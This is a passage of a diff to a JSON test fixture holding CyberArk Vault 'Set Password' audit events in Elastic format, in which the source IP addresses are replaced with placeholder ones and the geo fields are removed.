Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_VAGRANT\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}",
 "code": "88",
 "kind": "event"
 }
@@ -784,20 +690,8 @@
 }
 },
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "address": "81.32.170.205",
- "ip": "81.32.170.205"
+ "address": "67.43.156.13",
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -814,7 +708,7 @@
 },
 "related": {
 "ip": [
- "81.32.170.205"
+ "67.43.156.13"
 ]
 },
 "cyberarkpas": {
@@ -822,8 +716,8 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-11T16:59:55Z", - "station": "81.32.170.205", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 08:59:55\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T16:59:55Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e88\u003c/MessageID\u003e\n \u003cDesc\u003eSet Password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMPGW_VAGRANT\u003c/Issuer\u003e\n \u003cAction\u003eSet Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eSet Password\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "station": "67.43.156.13", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 08:59:55\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T16:59:55Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e88\u003c/MessageID\u003e\n \u003cDesc\u003eSet Password\u003c/Desc\u003e\n 
\u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMPGW_VAGRANT\u003c/Issuer\u003e\n \u003cAction\u003eSet Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eSet Password\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e",
 "action": "Set Password",
 "message": "Set Password",
 "issuer": "PSMPGW_VAGRANT",
@@ -837,8 +731,8 @@ "event": { "severity": 2, "action": "set password", - "ingested": "2021-06-09T10:24:37.212163900Z", - "original": "\u003c5\u003e1 2021-03-11T16:59:55Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:59:55\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:59:55Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e88\u003c/MessageID\u003e\\n \u003cDesc\u003eSet Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPGW_VAGRANT\u003c/Issuer\u003e\\n \u003cAction\u003eSet Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSet Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:59:55\",\"IsoTimestamp\":\"2021-03-11T16:59:55Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMPGW_VAGRANT\",\"Action\":\"Set 
Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:37:13.320185600Z", + "original": "\u003c5\u003e1 2021-03-11T16:59:55Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:59:55\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:59:55Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e88\u003c/MessageID\u003e\\n \u003cDesc\u003eSet Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPGW_VAGRANT\u003c/Issuer\u003e\\n \u003cAction\u003eSet Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSet Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:59:55\",\"IsoTimestamp\":\"2021-03-11T16:59:55Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set 
Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMPGW_VAGRANT\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}",
 "code": "88",
 "kind": "event"
 }
@@ -850,19 +744,8 @@
 }
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-VA",
- "country_name": "United States",
- "region_name": "Virginia",
- "location": {
- "lon": -77.2481,
- "lat": 38.6583
- },
- "country_iso_code": "US"
- },
- "address": "34.66.114.180",
- "ip": "34.66.114.180"
+ "address": "67.43.156.15",
+ "ip": "67.43.156.15"
 },
 "tags": [
 "preserve_original_event"
@@ -879,7 +762,7 @@
 },
 "related": {
 "ip": [
- "34.66.114.180"
+ "67.43.156.15"
 ]
 },
 "cyberarkpas": {
@@ -887,8 +770,8 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-11T20:10:33Z", - "station": "34.66.114.180", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 12:10:33\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T20:10:33Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e88\u003c/MessageID\u003e\n \u003cDesc\u003eSet Password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMApp_ASR-WIN\u003c/Issuer\u003e\n \u003cAction\u003eSet Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e34.66.114.180\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eSet Password\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "station": "67.43.156.15", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 12:10:33\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T20:10:33Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e88\u003c/MessageID\u003e\n \u003cDesc\u003eSet Password\u003c/Desc\u003e\n 
\u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMApp_ASR-WIN\u003c/Issuer\u003e\n \u003cAction\u003eSet Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eSet Password\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e",
 "action": "Set Password",
 "message": "Set Password",
 "issuer": "PSMApp_ASR-WIN",
@@ -902,8 +785,8 @@ "event": { "severity": 2, "action": "set password", - "ingested": "2021-06-09T10:24:37.212165200Z", - "original": "\u003c5\u003e1 2021-03-11T20:10:33Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 12:10:33\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T20:10:33Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e88\u003c/MessageID\u003e\\n \u003cDesc\u003eSet Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMApp_ASR-WIN\u003c/Issuer\u003e\\n \u003cAction\u003eSet Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e34.66.114.180\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSet Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 12:10:33\",\"IsoTimestamp\":\"2021-03-11T20:10:33Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_ASR-WIN\",\"Action\":\"Set 
Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"34.66.114.180\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:37:13.320191300Z", + "original": "\u003c5\u003e1 2021-03-11T20:10:33Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 12:10:33\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T20:10:33Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e88\u003c/MessageID\u003e\\n \u003cDesc\u003eSet Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMApp_ASR-WIN\u003c/Issuer\u003e\\n \u003cAction\u003eSet Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSet Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 12:10:33\",\"IsoTimestamp\":\"2021-03-11T20:10:33Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set 
Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_ASR-WIN\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}",
 "code": "88",
 "kind": "event"
 }
@@ -915,17 +798,8 @@
 }
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "country_name": "United States",
- "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
- },
- "address": "34.71.250.247",
- "ip": "34.71.250.247"
+ "address": "67.43.156.15",
+ "ip": "67.43.156.15"
 },
 "tags": [
 "preserve_original_event"
@@ -942,7 +816,7 @@
 },
 "related": {
 "ip": [
- "34.71.250.247"
+ "67.43.156.15"
 ]
 },
 "cyberarkpas": {
@@ -950,8 +824,8 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-14T12:57:25Z", - "station": "34.71.250.247", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 05:57:25\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T12:57:25Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e88\u003c/MessageID\u003e\n \u003cDesc\u003eSet Password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMPGW_SSH\u003c/Issuer\u003e\n \u003cAction\u003eSet Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eSet Password\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "station": "67.43.156.15", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 05:57:25\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T12:57:25Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e88\u003c/MessageID\u003e\n \u003cDesc\u003eSet Password\u003c/Desc\u003e\n 
\u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMPGW_SSH\u003c/Issuer\u003e\n \u003cAction\u003eSet Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eSet Password\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Set Password", "message": "Set Password", "issuer": "PSMPGW_SSH", 
@@ -965,8 +839,8 @@ "event": { "severity": 2, "action": "set password", - "ingested": "2021-06-09T10:24:37.212166500Z", - "original": "\u003c5\u003e1 2021-03-14T12:57:25Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:25\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:25Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e88\u003c/MessageID\u003e\\n \u003cDesc\u003eSet Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPGW_SSH\u003c/Issuer\u003e\\n \u003cAction\u003eSet Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSet Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:57:25\",\"IsoTimestamp\":\"2021-03-14T12:57:25Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMPGW_SSH\",\"Action\":\"Set 
Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:37:13.320197Z", + "original": "\u003c5\u003e1 2021-03-14T12:57:25Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:25\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:25Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e88\u003c/MessageID\u003e\\n \u003cDesc\u003eSet Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPGW_SSH\u003c/Issuer\u003e\\n \u003cAction\u003eSet Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSet Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:57:25\",\"IsoTimestamp\":\"2021-03-14T12:57:25Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set 
Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMPGW_SSH\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" } @@ -978,17 +852,8 @@ } }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.71.250.247", - "ip": "34.71.250.247" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -1005,7 +870,7 @@ }, "related": { "ip": [ - "34.71.250.247" + "67.43.156.15" ] }, "cyberarkpas": { 
@@ -1013,8 +878,8 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-14T12:57:25Z", - "station": "34.71.250.247", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 05:57:25\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T12:57:25Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e88\u003c/MessageID\u003e\n \u003cDesc\u003eSet Password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMPApp_SSH\u003c/Issuer\u003e\n \u003cAction\u003eSet Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n 